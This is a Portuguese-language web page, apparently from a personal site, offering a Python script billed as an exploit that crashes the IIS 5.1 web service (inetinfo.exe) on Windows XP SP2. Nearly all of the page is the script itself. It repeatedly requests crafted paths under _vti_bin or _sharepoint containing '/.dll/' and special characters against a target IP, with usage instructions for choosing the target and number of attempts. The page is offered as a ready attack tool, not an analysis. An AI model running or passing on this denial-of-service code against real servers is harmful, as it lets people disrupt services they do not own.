Document Actions

Exploit para derrubar o IIS 5.1 (inetinfo.exe)

Escrito em Python, testei no IIS 5.1 que vem no Windows XP SP2, não sei se funciona com outro.

Size 1.1 kB - File type text/python-source

File contents

#!/usr/bin/python

# Exploit para parar o servico inetinfo.exe (Servidor Web Micro$oft)
# Testado no IIS 5.1 no Windows XP Service Pack 2
# Autor: Rogerio Ferreira
# http://www.rogerioferreira.objectis.net
# Ultima Atualizacao: 28 Abr 2006

import urllib2, random, sys

pasta = random.choice(['_vti_bin','_sharepoint'])
ascii = random.choice(['%3f','"','*',':','<','>'])
barras = random.choice(['\\','/'])
numeros = str(random.choice(xrange(10)))

def main():
    """
	Entre com a seguinte sintaxe:

		python iis5hack.py [ip_do_alvo|hostname_do_alvo] [tentativas]

	Exemplo:

	Windows

		C:\Python24>python C:\TMP\iis5hack.py 192.168.0.80 5

	Linux

		$ python iis5hack.py 192.168.0.80 5

    """

    if len(sys.argv) < 3:
        print main.__doc__
        sys.exit()
            
    alvo = sys.argv[1]
    contador = int(sys.argv[2])

    for n in range(1,contador):
        try:
            url = urllib2.build_opener()
            url.open('http://' + alvo + '/' + pasta + '/.dll/' + ascii + barras + '~' + numeros)
        except:
            print "Tentando derrubar o IIS..."

    print "\n### Concluido! ###"
    
if __name__ == "__main__":
    main()

Rogerio Ferreira

Sections

Document Actions

Exploit para derrubar o IIS 5.1 (inetinfo.exe)

File contents